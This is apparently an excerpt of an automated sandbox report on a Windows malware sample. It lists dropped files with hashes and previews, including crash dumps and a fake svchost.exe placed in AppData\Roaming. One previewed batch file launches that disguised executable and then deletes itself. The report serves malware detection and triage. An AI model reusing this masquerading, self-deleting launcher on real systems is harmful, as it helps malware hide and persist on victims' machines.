e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBE7.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.684880477727558
Encrypted:	false
SSDEEP:	96:TiZYWFaVwzYsYPWYHYYYEZ2it8ivHDTrwMEf7adicMejoAIwF3:2ZD7L5HGwadicMejoXwF3
MD5:	35F9911E6C18EF93DC2C78077ECE018C
SHA1:	73B111DA52338484E0A65BE0F6321275D4318BBE
SHA-256:	40AA41C6A86C801DEDC42139241CBE4F35E49C8A888FDB47EC3016183B8DE4D0
SHA-512:	7ACBE93CD7C79CAE2C71B723A28C747BA95AAE000739C4C6C1095B1E0718C8570F6498057862BCC0993A1ED7F5FAC56AC859A168FD58428789CE4D84A573A4BE
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD632.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Jul 25 19:54:15 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	548368
Entropy (8bit):	3.5255922661484984
Encrypted:	false
SSDEEP:	6144:QqglZgTXj8gVKAqrvz5M3QNYJ5va+53uI46Jiumtqd:LTjnsAqr6QNkae+ta
MD5:	1E36FA63BE5242C9D97D38471C0B6EAC
SHA1:	D7606E74172C61EEE8CD68FD4093A530CDA50994
SHA-256:	5F54494154B9FB510C1E5857C9F066333B19FE2C112BBE85EE0BF249183BCFBF
SHA-512:	A632C279A29F7F2D8FAFB6134809AB8E875833288FC8F44421382D568677FB3801449D5137F66DE410E7C0FFF8FA7D86F2A2C2B0D128783AF31F7F7196A0A4AC
Malicious:	false
Preview:	MDMP..a..... .......g..f............D...........\|...d.......$....!.......:..."......d}..4...........l.......8...........T...............H/...........\...........^..............................................................................eJ......._......Lw......................T.......p...d..f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7F8.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8838
Entropy (8bit):	3.7124419863451736
Encrypted:	false
SSDEEP:	192:R6l7wVeJyJL6Y2DJygmf3L09prw89bbmWf5Jm:R6lXJkL6Y0ygmf3LMb3f2
MD5:	6527859B9EB4832BD30734EB4F531BC3
SHA1:	9291C6BA6C210154535148C19FB63960765B0A90
SHA-256:	4C326EFBA57EC100ACF8A39D28BEA83D20D93A733227A1658FE5DE1E2A2A66F5
SHA-512:	2670C17CCCB04F46379736039B97F3EEE260ECFEB50D39CFB4E3D62E90873684EE44B12EAA09082B30EA875F2048B8A44F742DAFA177E398071B8C8740D656D7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD828.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4739
Entropy (8bit):	4.493058754816254
Encrypted:	false
SSDEEP:	48:cvIwWl8zsFJg771I9QzWpW8VYwYm8M4JCMlF+Zmyq85q39i2+I0d:uIjffI7nC7VsJChc9i2+I0d
MD5:	A13F63226A5F18866223E528D69F67DF
SHA1:	2AFC2A6ABFEC6C155BA868C70FF1005F76DE43C1
SHA-256:	0D50D1EC7677DA771E4B814DD270E5B4EEF113BAD1027BAA84491B74A42F2FE5
SHA-512:	82283C186AA30D4DC82C02CB8298E6E7856EFA63390567BFFDF9E9577B22E0BAEC73111380FD213051F3B21AFFCD9D64B36E7A6ED2BC08B8D3F8C10C5952496E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426896" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD859.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84918
Entropy (8bit):	3.0388224838093114
Encrypted:	false
SSDEEP:	768:bMkocaiRf8yYnk6XWdw2DDNIgkCjM52aOWQaJSur3bviRlkAh:BocZ7Yk66wCdkCjM52aOWQOviRlkAh
MD5:	9F5F094239C9752A6E7EB638E77ACD23
SHA1:	C89E662638B76CDDDF2A577216FF572A8763882D
SHA-256:	C1DAF7713ABD1D8214968251D4D975C02D463F8C2AE6663844325F16F822D75B
SHA-512:	84FC10F9D1741E7846B30D81F1D3BA0813B654CB485E69B22E8EB153B91CC65C768240F3C35D67ECC5AB2EDD983A5354662782125EFCCB99E1A181BB99374A63
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD906.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685108318932944
Encrypted:	false
SSDEEP:	96:TiZYWAnTkRUYVY/WGHAYEZq9tFiAPyI5wZbA5F2/a3iNMxjo6IxF3:2ZDqyo4Q8a3iNMxjotxF3
MD5:	B46FEB39517E1DC38973CCBABFFE8036
SHA1:	C527853401AA849B7FF1F3F844D020DE8C9AEDCE
SHA-256:	C341EA2A37D7F84127D8081A8DC1F7D347569099A7738548E59C2A9E3E176568
SHA-512:	D6396A6CE758FD7ACC8B41464360B1E9235CB1D97AFC7834858D290F9D7F1DEF950559DAEDC966A432D518FD087C2CDE95AE48F598470B1DFF84DAAE0236A24F
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF524.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Jul 25 19:54:23 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	548228
Entropy (8bit):	3.5487512332233844
Encrypted:	false
SSDEEP:	3072:eHvgTXLxz3bQyFQf1CCq1b3+vhW5Hu7cvAjS4WPcICAU5cSYASu7TlXREE:eHvgTXLtgq1b3QhW5iLjS3EI/UpWuT1
MD5:	67693BB9E30AA3550C368D638A9EB96F
SHA1:	24D60B66A95FA5F270270B0E19DB0480D4218338
SHA-256:	2DABCD43A4A3B3C21524B4A81B7F2F9FAF33DA5E459985A2C12C0ED7A9CAC10A
SHA-512:	EF8F3B3C5FD782A2AFAAA18B91F8181BF224AC8C789135B7B0B37E3165B4D3C3A91FE3C3A87E7B3002BC98C8767570F0D534B4E4CE66EB24066EB59EDEA0ABA7
Malicious:	false
Preview:	MDMP..a..... .......o..f............D...........\|...d.......$....!.......:...".......}..4...........l.......8...........T............................\...........^..............................................................................eJ......._......Lw......................T...........l..f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF748.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8836
Entropy (8bit):	3.7121659550907933
Encrypted:	false
SSDEEP:	192:R6l7wVeJgfW6Y2Dv/gmf3L09prB89bulbfcjAam:R6lXJgW6Yi/gmf3LPuJfa8
MD5:	1F332D6E310567BD14A0DCE77D317FAE
SHA1:	B702E7D500CDC0982F2CF5304D925AA7E918BFA5
SHA-256:	DD5B0FED68503CC38B438C78D92AA573A13DA5C5435CF5E38233D6B76F0B45C6
SHA-512:	B1E10121F7F0E80D44480AF7A5B1F4593A55A7F98006AA9A03353CA27D1437585ECC80DD2631DF5F3C44295D9AD1522D0EA9CA8AED84D6A0ECBCC6198A1DC3C6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF797.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4739
Entropy (8bit):	4.491162331553506
Encrypted:	false
SSDEEP:	48:cvIwWl8zsuJg771I9QzWpW8VY7Ym8M4JCMlFfIyq85qSfri2+Ixd:uIjfkI7nC7VnJCsICfri2+Ixd
MD5:	741A0FA1A0EF60F5066F3EA66BAF5B62
SHA1:	D5EC894B6E7D35B4389E1CFBEBE0066BFDD635CD
SHA-256:	331AA88379380EA1D428108050062CCE7B3EBDE0E5FAD72B931190E197CAEF22
SHA-512:	EE45F69AAA63CF549F0E4E96BC69CA3432960165AC1C8F9FA31596B3FD48A8E3168F0E4B4ABC6998AC826CFD524C04C5112801BB9A7CECC6DD6B1608C05F1F9A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426897" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF7DA.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	85332
Entropy (8bit):	3.0384952889249477
Encrypted:	false
SSDEEP:	768:LiWjaHSR5RA+72iUzUN8nscf/CuM32afxQXJbuQ3bviRlh5z:WWjhR4+yi5NE3CuM32afxQrviRlh5z
MD5:	3C48F44F1D9B9694A49E918CFCF3D18D
SHA1:	97DF8219186F9B2213E2C37ECD35EFAF96D017D9
SHA-256:	56C8F5255B87DC25850EA296B1CE56E90BB1B8EC08E984B2DA85AE983A6A89E7
SHA-512:	05FD7D92342A3B7DBE5FF4D91A9163D0CCFD6B071590F9D6B9842D595FA144B389B3CBF44F9D3C53D381D9AAEC9B5266F899AC545B3A1A4EE80C521531CAA151
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF980.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6850844458341006
Encrypted:	false
SSDEEP:	96:TiZYWV1DhPeYEYJW47HlYEZ8e4tFi9PVjIxwG1mKia3iGMCpoWITF3:2ZDVmznehc6a3iGMCpoRTF3
MD5:	F1C109ED3F50743BBDC2474083FBE123
SHA1:	25CE4CB06984E2050D3F0FF17AC0104D30085F00
SHA-256:	137FBD9D7B0584292E81F66E8D5DE3300B70F7364A44FC504676140DBF82799A
SHA-512:	0AB21EEF0751BA9FC8F0FBF95493A057E91E9EB2A4C8FE1A2839CA9F739E3D0AA2BB260F93FA39339A11530D61DB227DE074F76FCD5407A22E83F77E9FBB4870
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LisectAVT_2403002A_29.exe.log

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_29.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1690
Entropy (8bit):	5.383209643113553
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkpLHqHd+vxp3/elT:iq+wmj0qCYqGSI6oPtzHeqKkpLK0Zp/E
MD5:	22E3D932C33DAADEA89215E08BC3ECCD
SHA1:	1630532762AC552F9686882DDD2E8BF0D67FBEB8
SHA-256:	153228696081160BDF3AACC802D6A3E2BA5DDED2431AC302FC8F2E8EE8E99EB2
SHA-512:	528849DF4058FBB24C1CAC7D34DC19CFAEB4D942C44DA059DC91E67901DF73581803B1C5233FABE2ED00E58E9C3E0D99AF7958C501CF45FC242EF8B16B74FD4C
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\tmp990A.tmp.bat

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_29.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	157
Entropy (8bit):	5.0290876219708585
Encrypted:	false
SSDEEP:	3:mKDDCMNqTtvL5oN+EaKC5ZACSmqRDN+E2J5xAInTRI2cVCuh1ZPy:hWKqTtT6N7aZ5Omq1N723fTXcV7h1k
MD5:	3607B5589D9669424D56017BAF18D435
SHA1:	9F5BEE0CECEB59AE3C50C03934C6740409563A07
SHA-256:	89DFDD05C0E7B8EC6023554072BD23FD4E43F2A9C950E688224EA0918EF5D74E
SHA-512:	32F9F01A74446A746F5909DD486D3F54EDCCD0C7225AFF552B625D586B9491B8A1F74174A8A7BE84EC3680324770FFD6F610F3FD4CA1BFB9CF60CB577E98A9E7
Malicious:	false
Preview:	@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp990A.tmp.bat" /f /q..

C:\Users\user\AppData\Roaming\svchost.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_29.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	684153
Entropy (8bit):	7.938253844711648
Encrypted:	false
SSDEEP:	12288:zuLD9C9DaFlVqcwO9kuereZz5WgZtjs1Ux6xdE0Is0JAIActwqk67tjbFR:zsuMA7O9nZQktjs1+ps0CI1Ox6nR
MD5:	E6A5050DE4674C9280D6FB1A51456867
SHA1:	FDE04FB3D905CF314A22836276BC668BFCEF2E5A
SHA-256:	1B479DC4D8B2E7B2CA7FCDA6699835A14223BF7C1540D6100B98F6658C8C165F
SHA-512:	C6C9BFB28DB70EFE4319BE6B2AF7BC3C22CDAB5ED06FB864633D3E18DA0EEFDC2EC9581D3AED8E9086947CB0B7B1630FCE42B66502B9DAA7199CF68B41824825
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5..........."...0..[............... ....@...... ....................................`..........................................................................................{..8............................................................ ..H............text....[... ...\.................. ..`.rsrc................^..............@..@........................................H.......xh..............Hz..............................................H.......2~.....o,...2~.....o,...Vs2........s2..........(3...:.(3.....}....6.(4....(......(5...z.,..{....,..{....o6.....(7.....r...p(....~N...oO........r[..p(....oP...-..+...(Q...f.,..,...,...,...i..i....r...p(....(....r...p(....(.........(V...(W...t........o....R.oh.......ioi.........(........( ...}5.......( ...Z}6......( ...}7...V.(#...-.(z....({..."..(\|.......(}..."..(~..."..(....*"..(....

